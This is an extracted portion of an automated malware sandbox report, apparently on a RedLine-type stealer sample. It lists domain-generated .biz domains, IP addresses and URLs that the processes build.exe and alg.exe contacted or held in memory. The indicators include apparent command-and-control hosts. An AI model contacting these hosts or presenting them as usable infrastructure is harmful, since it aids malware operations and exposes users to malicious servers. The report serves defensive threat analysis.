                            		truetrueunknown
                            xccjj.biz
                            		44.213.104.86
                            		truetrueunknown
                            wxgzshna.biz
                            		72.52.178.23
                            		truefalse
                              		unknown
                              oshhkdluh.biz
                              		54.244.188.177
                              		truetrue
                                		unknown
                                opowhhece.biz
                                		18.208.156.248
                                		truetrue
                                  		unknown
                                  pectx.biz
                                  		44.213.104.86
                                  		truetrue
                                    		unknown
                                    jwkoeoqns.biz
                                    		18.208.156.248
                                    		truetrue
                                      		unknown
                                      jpskm.biz
                                      		34.211.97.45
                                      		truetrue
                                        		unknown
                                        ftxlah.biz
                                        		47.129.31.212
                                        		truetrue
                                          		unknown
                                          ifsaia.biz
                                          		13.251.16.150
                                          		truetrue
                                            		unknown
                                            rynmcq.biz
                                            		54.244.188.177
                                            		truetrue
                                              		unknown
                                              oflybfv.biz
                                              		47.129.31.212
                                              		truetrue
                                                		unknown
                                                jhvzpcfg.biz
                                                		44.221.84.105
                                                		truetrue
                                                  		unknown
                                                  ywffr.biz
                                                  		54.244.188.177
                                                  		truetrue
                                                    		unknown
                                                    tnevuluw.biz
                                                    		35.164.78.200
                                                    		truetrue
                                                      		unknown
                                                      saytjshyf.biz
                                                      		44.221.84.105
                                                      		truetrue
                                                        		unknown
                                                        fwiwk.biz
                                                        		172.234.222.143
                                                        		truefalse
                                                          		unknown
                                                          rrqafepng.biz
                                                          		47.129.31.212
                                                          		truetrue
                                                            		unknown
                                                            typgfhb.biz
                                                            		13.251.16.150
                                                            		truetrue
                                                              		unknown
                                                              esuzf.biz
                                                              		34.211.97.45
                                                              		truetrue
                                                                		unknown
                                                                eufxebus.biz
                                                                		18.141.10.107
                                                                		truetrue
                                                                  		unknown
                                                                  whjovd.biz
                                                                  		18.141.10.107
                                                                  		truetrue
                                                                    		unknown
                                                                    banwyw.biz
                                                                    		44.221.84.105
                                                                    		truetrue
                                                                      		unknown
                                                                      myups.biz
                                                                      		165.160.15.20
                                                                      		truefalse
                                                                        		unknown
                                                                        pwlqfu.biz
                                                                        		34.246.200.160
                                                                        		truetrue
                                                                          		unknown
                                                                          zyiexezl.biz
                                                                          		18.208.156.248
                                                                          		truetrue
                                                                            		unknown
                                                                            yauexmxk.biz
                                                                            		18.208.156.248
                                                                            		truetrue
                                                                              		unknown
                                                                              ssbzmoy.biz
                                                                              		18.141.10.107
                                                                              		truetrue
                                                                                		unknown
                                                                                knjghuig.biz
                                                                                		18.141.10.107
                                                                                		truetrue
                                                                                  		unknown
                                                                                  yunalwv.biz
                                                                                  		208.100.26.245
                                                                                  		truefalse
                                                                                    		unknown
                                                                                    brsua.biz
                                                                                    		3.254.94.185
                                                                                    		truetrue
                                                                                      		unknown
                                                                                      mgmsclkyu.biz
                                                                                      		34.246.200.160
                                                                                      		truetrue
                                                                                        		unknown
                                                                                        gjogvvpsf.biz
                                                                                        		208.100.26.245
                                                                                        		truefalse
                                                                                          		unknown
                                                                                          qaynky.biz
                                                                                          		13.251.16.150
                                                                                          		truetrue
                                                                                            		unknown
                                                                                            qpnczch.biz
                                                                                            		44.213.104.86
                                                                                            		truetrue
                                                                                              		unknown
                                                                                              mnjmhp.biz
                                                                                              		47.129.31.212
                                                                                              		truetrue
                                                                                                		unknown
                                                                                                acwjcqqv.biz
                                                                                                		18.141.10.107
                                                                                                		truetrue
                                                                                                  		unknown
                                                                                                  jdhhbs.biz
                                                                                                  		13.251.16.150
                                                                                                  		truetrue
                                                                                                    		unknown
                                                                                                    anpmnmxo.biz
                                                                                                    		unknown
                                                                                                    		unknowntrue
                                                                                                      		unknown
                                                                                                      zjbpaao.biz
                                                                                                      		unknown
                                                                                                      		unknowntrue
                                                                                                        		unknown
                                                                                                        uhxqin.biz
                                                                                                        		unknown
                                                                                                        		unknowntrue
                                                                                                          		unknown
                                                                                                          zlenh.biz
                                                                                                          		unknown
                                                                                                          		unknowntrue
                                                                                                            		unknown
                                                                                                            muapr.biz
                                                                                                            		unknown
                                                                                                            		unknowntrue
                                                                                                              		unknown
                                                                                                              lejtdj.biz
                                                                                                              		unknown
                                                                                                              		unknowntrue
                                                                                                                		unknown

                                                                                                                Contacted URLs

                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                http://yhqqc.biz/vqtoaehatrue
                                                                                                                  		unknown
                                                                                                                  http://jpskm.biz/hisgijrksnbtrue
                                                                                                                    		unknown
                                                                                                                    http://przvgke.biz/ajvaopkagnfalse
                                                                                                                      		unknown
                                                                                                                      http://lpuegx.biz/pkabvaplwbiqxfalse
                                                                                                                        		unknown
                                                                                                                        http://gjogvvpsf.biz/xvwjoyasecofgdfalse
                                                                                                                          		unknown
                                                                                                                          http://xlfhhhm.biz/hqlbcdtcvtrue
                                                                                                                            		unknown
                                                                                                                            http://oflybfv.biz/vnjrxnyhwihcgtrue
                                                                                                                              		unknown
                                                                                                                              http://vyome.biz/ksvtsxtrue
                                                                                                                                		unknown
                                                                                                                                http://lpuegx.biz/mgufalse
                                                                                                                                  		unknown
                                                                                                                                  http://ecxbwt.biz/tckhwxqtjtrue
                                                                                                                                    		unknown
                                                                                                                                    http://typgfhb.biz/hkdwngtrue
                                                                                                                                      		unknown
                                                                                                                                      http://ifsaia.biz/wkqumdvynqwtotrue
                                                                                                                                        		unknown
                                                                                                                                        http://rrqafepng.biz/hatrue
                                                                                                                                          		unknown
                                                                                                                                          http://cvgrf.biz/aguptrue
                                                                                                                                            		unknown
                                                                                                                                            http://lpuegx.biz/xkjanqfjaocnfalse
                                                                                                                                              		unknown
                                                                                                                                              http://ctdtgwag.biz/sonhfctrue
                                                                                                                                                		unknown
                                                                                                                                                http://fwiwk.biz/dokmgufalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://yunalwv.biz/cxfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://jdhhbs.biz/oknxycjjxcvmcygtrue
                                                                                                                                                      		unknown
                                                                                                                                                      http://mnjmhp.biz/eeswgjxjcwhatrue
                                                                                                                                                        		unknown
                                                                                                                                                        http://brsua.biz/npjswmwoxwkrbxdtrue
                                                                                                                                                          		unknown
                                                                                                                                                          http://bumxkqgxu.biz/iafrakxbkhxwqotrue
                                                                                                                                                            		unknown
                                                                                                                                                            http://eufxebus.biz/iaiodpshpbtrue
                                                                                                                                                              		unknown
                                                                                                                                                              http://typgfhb.biz/uluonacniewneptrue
                                                                                                                                                                		unknown
                                                                                                                                                                http://hehckyov.biz/bvbcgrbcstrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://opowhhece.biz/butjufvvmucwutrue
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://dlynankz.biz/qtgyqfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://dlynankz.biz/hdqasqyyfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://przvgke.biz/ysrvxblocwefkfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://nqwjmb.biz/oiwersrybttrue
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://gytujflc.biz/jaefalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://tnevuluw.biz/yavfpoeutrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://acwjcqqv.biz/sxrtljpowkklyfeptrue
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://api.ipify.org/false
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://gytujflc.biz/lyfalse
                                                                                                                                                                                    		unknown

                                                                                                                                                                                    URLs from Memory and Binaries

                                                                                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://tempuri.org/Entity/Id23ResponseDbuild.exe, 00000007.00000002.2559158756.00000000031E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://tempuri.org/build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://tempuri.org/Entity/Id2Responsebuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://tempuri.org/Entity/Id21Responsebuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://13.251.16.150/fymjdtcvalg.exe, 00000009.00000003.2576145561.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576692201.0000000000562000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2575063402.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://54.244.188.177:80/khpdqtysqhgfPalg.exe, 00000009.00000003.2756641044.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://13.251.16.150:80/mgsjgpoacwottwhxfPalg.exe, 00000009.00000003.3120774885.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://44.213.104.86:80/kpiticjpbalg.exe, 00000009.00000003.3298047259.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencebuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://3.254.94.185:80/vsxacwvtkoalg.exe, 00000009.00000003.3191422112.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3169068917.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://44.213.104.86/ksvtsxsnbalg.exe, 00000009.00000003.2963627341.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2953099038.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://82.112.184.197:80/gocchgnxickoalg.exe, 00000009.00000003.2544401185.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://54.244.188.177:80/ucrfyypmempwnmalg.exe, 00000009.00000003.2709340960.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        http://44.213.104.86:80/ohpmalg.exe, 00000009.00000003.2963959260.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2953099038.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://47.129.31.212/hqlbcdtcvalg.exe, 00000009.00000003.2559065749.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            http://44.221.84.105/alg.exe, 00000009.00000002.3323934646.000000000053D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeybuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                http://18.208.156.248:80/wcffwbepjknhrkkdPalg.exe, 00000009.00000003.3048558345.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  https://api.ip.sb/ipNative_Redline_BTC.exe, 00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000006.00000002.2132146464.0000000012309000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000006.00000002.2132146464.0000000012397000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000000.2126000556.0000000000BC2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  http://3.94.10.34:80/ocntklkdalg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                      http://tempuri.org/Entity/Id24Responsebuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegobuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          http://208.100.26.245/lysalg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2718655052.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2726765067.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2651055218.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2768613145.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2739777279.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2756206332.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2709340960.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2745831053.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2682321054.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2740295647.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressingbuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            http://208.100.26.245/xvwjoyasecofgdalg.exe, 00000009.00000003.3218423804.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3256074527.000000000058B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3232490363.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3253000018.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3290510552.000000000058C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3306777601.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3218423804.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3220609083.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000002.3323934646.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3219316989.00000000005A7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3298047259.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3230534446.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3239370210.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                              http://82.112.184.197:80/dmaeafalg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544401185.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2504415483.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544895268.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2465112671.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2559065749.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                http://35.164.78.200:80/oiwersrybtPalg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2718655052.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                  http://tempuri.org/Entity/Id10ResponseDbuild.exe, 00000007.00000002.2559158756.0000000003146000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsebuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                      http://18.208.156.248/sgbnffiuqoo%alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2641781426.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2718655052.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2726765067.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2651055218.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2709340960.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2682321054.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                        http://tempuri.org/Entity/Id5Responsebuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                          http://tempuri.org/Entity/Id15ResponseDbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                            http://tempuri.org/Entity/Id10Responsebuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                              http://tempuri.org/Entity/Id8Responsebuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                  http://18.208.156.248/wcffwbepjknhrkkdalg.exe, 00000009.00000003.3050069889.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3047643251.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3079434309.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3030359798.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3058249726.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3078569820.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3061259113.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3031391633.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentitybuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                      http://34.211.97.45:80/csepohryabqocrsdPLcCalg.exe, 00000009.00000003.3230534446.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                        http://18.141.10.107:80/iaiodpshpbalg.exe, 00000009.00000003.3191422112.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/Noncebuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                http://172.234.222.143:80/wwalg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2229224734.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2211690726.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2465112671.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2228386739.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2444067771.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2210828989.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                  http://tempuri.org/Entity/Id13Responsebuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                    http://3.254.94.185:80/npjswmwoxwkrbxdalg.exe, 00000009.00000003.2963959260.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertybuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                          http://208.100.26.245:80/jaegqlalg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2651055218.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2682321054.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                            http://44.221.84.105:80/wrjeoypalg.exe, 00000009.00000002.3323934646.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                              http://208.100.26.245:80/xnxlkgkrmwlxblktPalg.exe, 00000009.00000003.2768613145.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                http://34.246.200.160:80/qqxxgqlalg.exe, 00000009.00000003.2641781426.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2634085222.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementbuild.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                  http://tempuri.org/Entity/Id4ResponseDbuild.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                    http://18.208.156.248:80/mvljrpbalg.exe, 00000009.00000003.3306777601.000000000056E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                      		unknown
